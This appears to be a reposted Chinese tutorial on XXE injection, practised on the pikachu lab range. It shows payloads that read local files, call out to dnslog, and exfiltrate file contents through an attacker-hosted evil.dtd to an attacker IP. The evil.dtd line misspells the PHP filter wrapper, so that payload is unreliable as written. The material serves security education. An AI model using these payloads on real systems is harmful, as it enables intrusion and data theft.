XXE漏洞原理和pikachu靶场实验

2024-03-16 22:12

本文主要是介绍XXE漏洞原理和pikachu靶场实验,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、XXE漏洞原理

XXE全称:XML External Entity Injection,XML外部实体注入。XXE漏洞主要是由于危险的外部实体引用和未对外部实体进行敏感字符的过滤,从而造成命令执行、目录遍历等。攻击者通过构造恶意的外部实体,当解析器解析包含“恶意”外部实体的XML类型文件,就会导致XXE攻击。

摘自百度百科

XML全称:Extensible Markup Language,可扩展标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

2、XXE的危害

1、导致可加载恶意外部文件、读取任意未授权文件,

2、恶意消耗内存进行DOS攻击,

3、探测内网信息,比如检测服务、内网端口扫描、攻击内网网站等,

4、命令执行、目录遍历等,

5、由于有些XML解析库支持列目录,攻击者通过列目录、读文件,获取账号密码后进一步攻击,比如读取tomcat-users.xml得到账号密码后登录tomcat的manager部署webshell。

3、XML分类

XXE的攻击方式分为两种:显示攻击和盲攻击。

**显示攻击: **攻击者可通过正常的回显将外部实体的内容读取出来;

盲攻击: 不显示外部实体的内容,可利用参数实体将本地文件内容读出来,作为URL参数向它指定服务器发起请求,然后在它指定服务器的日志中读取文件的内容。

4、pikachu靶场实验

4.0、环境准备

靶场环境搭建详参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》

4.1、普通实体

把这些xml代码放到文本框提交

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe "你今天真好看">
]>
<foo>&xxe;</foo>

提交结果

在这里插入图片描述

4.2、外部引用

把这些xml代码放到文本框提交

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/windows/win.ini">
]>
<foo>&xxe;</foo>

提交结果

在这里插入图片描述

4.3、盲注-利用dnslog

当没有回显提示信息时,可利用dnslog判断是否存在xxe漏洞。使用外部引用,在路径填写dnslog路径,然后在dnslog网站查看。

访问:https://dnslog.org/,点击Get Sub Domain按钮获取子域名放到xml代码

在这里插入图片描述

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://108c09f2.dnslog.store">
]>
<foo>&xxe;</foo>

提交后到https://dnslog.org/,点击Get Results查看注入结果,表示xxe注入成功

在这里插入图片描述

4.5、借助kali模拟攻击
4.5.0、前置说明

针对没有回显的,需要VPS(Virtual Private Server,虚拟专用服务器,简称VPS),这里使用kali模拟。

环境说明

攻击机kali(虚拟机):192.168.242.4
靶机win7(虚拟机):192.168.242.6
4.5.1 、kali开启http服务

使用python快速开启http服务,注入先使用sudo su命令切换到管理员权限。

python3 -m http.server 80

在这里插入图片描述

4.5.2、kali创建evil.dtd

先在自己电脑本机创建evil.dtd,内容如下,

<!ENTITY % file SYSTEM "php://fiter/reader=convert.base64-encode/resource=file:///xxe.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.242.4?c=%file;'>">

创建一个文本xxe.txt,里面写123或自己任意写内容,和evil.dtd一起复制到kali的系统目录下:/home/kali

在这里插入图片描述

4.5.3、win7系统测试

可以直接在浏览器访问:http://192.168.242.4/evil.dtd,会看到目录展示和下载evil.dtd。

在这里插入图片描述

pikachu使用下面的xml提交,

<!DOCTYPE convert[<!ENTITY % remote SYSTEM "http://192.168.242.4/evil.dtd">%remote;%int;%send;
]>
4.5.4、kali看数据读取成功

在这里插入图片描述

5、资料获取

如果需要kali和win7系统虚拟机,进行实验的话(如果在渗透测试实战已有下载过,不需要再下载了),请关注我的公众号:大象只为你,后台回复:虚拟机。文件有些大下载耗时会比较久。

6、下期内容预告

《跟我学网安知识》系列文章截止目前已分享49篇啦,也接近尾声了,还有内网一些知识,由于我还未整理成笔记,下周三要参加CISP考试和自己其他一些事情要忙,本周先暂时分享XXE这一篇。预计在下周六/日分享内网的知识点,内网部分可能大约2~3篇左右就结束了。

后面还会再分享技术文章,可能是Java专题系列,或自己挖漏洞的分享,来倒逼自己产出和学习,敬请关注我的公众号:大象只为你。

这篇关于XXE漏洞原理和pikachu靶场实验的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/816873

相关文章

MySQL中的MVCC底层原理解读

《MySQL中的MVCC底层原理解读》本文详细介绍了MySQL中的多版本并发控制(MVCC)机制,包括版本链、ReadView以及在不同事务隔离级别下MVCC的工作原理,通过一个具体的示例演示了在可重... 目录简介ReadView版本链演示过程总结简介MVCC(Multi-Version Concurr

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库

Redis主从/哨兵机制原理分析

《Redis主从/哨兵机制原理分析》本文介绍了Redis的主从复制和哨兵机制,主从复制实现了数据的热备份和负载均衡,而哨兵机制可以监控Redis集群,实现自动故障转移,哨兵机制通过监控、下线、选举和故... 目录一、主从复制1.1 什么是主从复制1.2 主从复制的作用1.3 主从复制原理1.3.1 全量复制

Redis主从复制的原理分析

《Redis主从复制的原理分析》Redis主从复制通过将数据镜像到多个从节点,实现高可用性和扩展性,主从复制包括初次全量同步和增量同步两个阶段,为优化复制性能,可以采用AOF持久化、调整复制超时时间、... 目录Redis主从复制的原理主从复制概述配置主从复制数据同步过程复制一致性与延迟故障转移机制监控与维

SpringCloud配置动态更新原理解析

《SpringCloud配置动态更新原理解析》在微服务架构的浩瀚星海中,服务配置的动态更新如同魔法一般,能够让应用在不重启的情况下,实时响应配置的变更,SpringCloud作为微服务架构中的佼佼者,... 目录一、SpringBoot、Cloud配置的读取二、SpringCloud配置动态刷新三、更新@R

Redis主从复制实现原理分析

《Redis主从复制实现原理分析》Redis主从复制通过Sync和CommandPropagate阶段实现数据同步,2.8版本后引入Psync指令,根据复制偏移量进行全量或部分同步,优化了数据传输效率... 目录Redis主DodMIK从复制实现原理实现原理Psync: 2.8版本后总结Redis主从复制实

深入探索协同过滤:从原理到推荐模块案例

文章目录 前言一、协同过滤1. 基于用户的协同过滤(UserCF)2. 基于物品的协同过滤(ItemCF)3. 相似度计算方法 二、相似度计算方法1. 欧氏距离2. 皮尔逊相关系数3. 杰卡德相似系数4. 余弦相似度 三、推荐模块案例1.基于文章的协同过滤推荐功能2.基于用户的协同过滤推荐功能 前言     在信息过载的时代,推荐系统成为连接用户与内容的桥梁。本文聚焦于

hdu4407(容斥原理)

题意:给一串数字1,2,......n,两个操作:1、修改第k个数字,2、查询区间[l,r]中与n互质的数之和。 解题思路:咱一看,像线段树,但是如果用线段树做,那么每个区间一定要记录所有的素因子,这样会超内存。然后我就做不来了。后来看了题解,原来是用容斥原理来做的。还记得这道题目吗?求区间[1,r]中与p互质的数的个数,如果不会的话就先去做那题吧。现在这题是求区间[l,r]中与n互质的数的和

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

hdu4407容斥原理

题意: 有一个元素为 1~n 的数列{An},有2种操作(1000次): 1、求某段区间 [a,b] 中与 p 互质的数的和。 2、将数列中某个位置元素的值改变。 import java.io.BufferedInputStream;import java.io.BufferedReader;import java.io.IOException;import java.io.Inpu